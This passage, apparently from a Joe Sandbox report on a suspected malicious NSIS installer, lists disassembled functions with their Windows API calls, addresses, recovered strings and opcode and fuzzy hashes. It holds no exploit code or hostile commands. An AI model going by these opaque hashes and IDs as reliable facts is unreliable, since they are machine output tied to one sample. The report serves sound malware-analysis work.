                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$A
                                                          • API String ID: 2624150263-3645020878
                                                          • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                          • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                          • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                          • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                          • wsprintfA.USER32 ref: 004060B3
                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                          • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                            • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                          • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                          • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                          • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402F44
                                                          • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                            • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                          • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                          Strings
                                                          • Null, xrefs: 00403029
                                                          • Inst, xrefs: 00403017
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                          • Error launching installer, xrefs: 00402F80
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                          • soft, xrefs: 00403020
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-787788815
                                                          • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                          • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                          • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                          • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                          • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                          • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                          • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                          • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                          • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                          • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-730719616
                                                          • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                          • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                          • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                          • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                          • GetSysColor.USER32(00000000), ref: 00404421
                                                          • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                          • SetBkMode.GDI32(?,?), ref: 00404439
                                                          • GetSysColor.USER32(?), ref: 0040444C
                                                          • SetBkColor.GDI32(?,?), ref: 0040445C
                                                          • DeleteObject.GDI32(?), ref: 00404476
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                          • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                          • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                            • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                          • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                          • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                          • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                          APIs
                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                          • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                          • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                          • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                          • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                          • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                          • GetTickCount.KERNEL32 ref: 00402EC7
                                                          • wsprintfW.USER32 ref: 00402EF5
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                            • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                          • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                          • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                          • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                          • GetMessagePos.USER32 ref: 00404D3D
                                                          • ScreenToClient.USER32(?,?), ref: 00404D57
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                          • wsprintfW.USER32 ref: 004067A4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                          • wsprintfW.USER32 ref: 00402E45
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                          • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                          • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                          • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                          APIs
                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                          • wsprintfW.USER32 ref: 00404CB6
                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$(7B
                                                          • API String ID: 3540041739-1320723960
                                                          • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                          • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                          • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                          • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                          • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                          • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                          • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                          • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                          • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                            • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                            • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                            • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                            • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                          • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                          • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                          • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401DBC
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                          • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                          • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
